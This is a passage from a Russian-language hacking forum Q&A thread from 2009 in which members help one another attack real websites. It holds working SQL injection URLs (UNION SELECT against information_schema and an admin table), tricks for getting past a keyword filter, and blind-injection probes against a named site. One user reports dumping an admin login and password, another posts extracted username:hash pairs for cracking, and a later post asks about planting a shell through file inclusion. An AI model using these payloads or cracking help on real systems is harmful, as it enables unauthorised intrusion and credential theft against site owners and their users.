Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 Adm1n4eG
    try

    http://site.com/body.php?id=-1+union+all+select+1,2,3,concat(0x3a,table_name,0x3a,table_schema),5,6,7,8+from+i nformation_schema.tables+limit+1,1--
     
  2. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Тогда уж лимит+17,1 :)

    Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html

    Читай там вопрос номер 3.
     
    1 person likes this.
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Тебе же сказали:

    1. http://site.com/body.php?id=-1+union+all+select+1,2,3,count(*),5,6,7,8+from+admin--

    - подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица

    2. . http://site.com/body.php?id=-1+union+all+select+1,2,3,table_schema+from+information_schema.columns+where+table_name=0x61646d696e

    - узнай точную БД, где находится табла admin, может просто не в текущей БД, а потом делай запросы подставляя сначала название_бд.admin

    3. unhex(hex(данные)), aes_decrypt(aes_encrypt(данные)) - просто несповпадение кодировок, в общем проверяй

    4. Просто нет прав на чтение данной таблицы у текущего юзера
     
    #7683 Pashkela, 20 Jun 2009
    Last edited: 20 Jun 2009
  4. Adm1n4eG

    Adm1n4eG Member

    Joined:
    27 Mar 2009
    Messages:
    24
    Likes Received:
    13
    Reputations:
    6
    Тож забыл сразу сказать в таблице admin есть 2 колонки account и pwd но почему то при проверке count(*) все равно появилась ошибка...

    R1dex большое спасибо!!!

    эт я както упустил )))
    все таки оказалось что таблица находится не в той базе с которой работает скрип
    проверил это таким образом:

    Запрос выдал: bwbvdisk

    Итоговый запрос и получение админского логина и пасса:
    Всем кто помогал спс!
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ну вообще если в таблице нет ниодной записи ошибки не будет, а на страницу выведуться null'и
    пробуй select user from mysql.user limit 9999999
     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Можно ли в подзапросах обойтись без использования from? Union фильтруется,как и from
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    нет, искать обход фильтра
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    какой обход? фильтрация всей конструкции select from
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Если встречается select from подряд,то форбидн.А вот если from select или отдельно,то нет.
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    смотря какая фильтрация - есть грамотная, и ничего сделать нельзя, а есть дурацкая, и тогда можно всё. Мало инфы выдаешь - столько тусить УЖЕ на ачаде и так тупить, есть ли ошибки, выводящиеся на экран, нет их, и etc. Выдавай сразу МНОГО, ОЧЕНЬ МНОГО, ПО МАКСИМУМУ инфы, не заставляй флудить, ибо ведет такое общение к полному игнору

    ЗЫЖ Надо же, успел отпостить:)))

    Вот по результатам выводимых ошибок и ориентируйся - SELECT FROM, SElecT FrOM, selSELECTect FrFRomOM и etc. Пробуй в общем
     
    #7690 Pashkela, 21 Jun 2009
    Last edited: 21 Jun 2009
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    select from насколько я помню это древняя защита sweb-хостинга
    Отправляй данные не Гетом, а Постом
    https://forum.antichat.ru/showthread.php?t=56409
     
    #7691 Spyder, 21 Jun 2009
    Last edited: 21 Jun 2009
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    выудил из бд... но я не знаю что здесь за хеш, кто может мне помочь, буду очень благодарен
    smomanyi:a750e0be90a80128d99c46278e3c2af47fa83a16272fe77e8596da00d34fdda9
    jmgutu:1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032
     
  13. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    SHA-256 походу
     
  14. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://www.insidepro.com/hashes.php?lang=eng
    ищи и сравнивай :)
     
    1 person likes this.
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Не надо ничего искать и сравнивать, всё уже сделано до нас:

    http://bug-track.ru/prog/encoder1.0.rar - вставить хеш и посмотреть вниз
     
    3 people like this.
  16. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Вопрос по скуле.
    Имеем:
    http://stat.vbios.com/bf2/?rid=19708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- 1
    http://stat.vbios.com/bf2/?rid=19708+order+by+16 -- 1
    Чтоже не правильно то,пишет все время что колумнов не правильно подобрал я :(
    Tables: kills, maps
     
    #7696 m0Hze, 22 Jun 2009
    Last edited: 22 Jun 2009
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    хз короче, но вот это:

    Code:
    http://stat.vbios.com/bf2/?rid=19708+or+1=1+and+substring(version(),1,1)=5
    
    отличается от всего остального
     
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    значит читай про BLIND-SQL там поймешь как ее раскрутить :)
     
    _________________________
  19. WinMain()

    WinMain() Banned

    Joined:
    22 Jun 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Слышал что в ллокальном инклуде можно залить шелл удалённо. Это действительно так? и каким способом? подскажите плиз.
     
  20. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    https://forum.antichat.ru/showpost.php?p=1088072&postcount=11
     
    1 person likes this.
Thread Status:
Not open for further replies.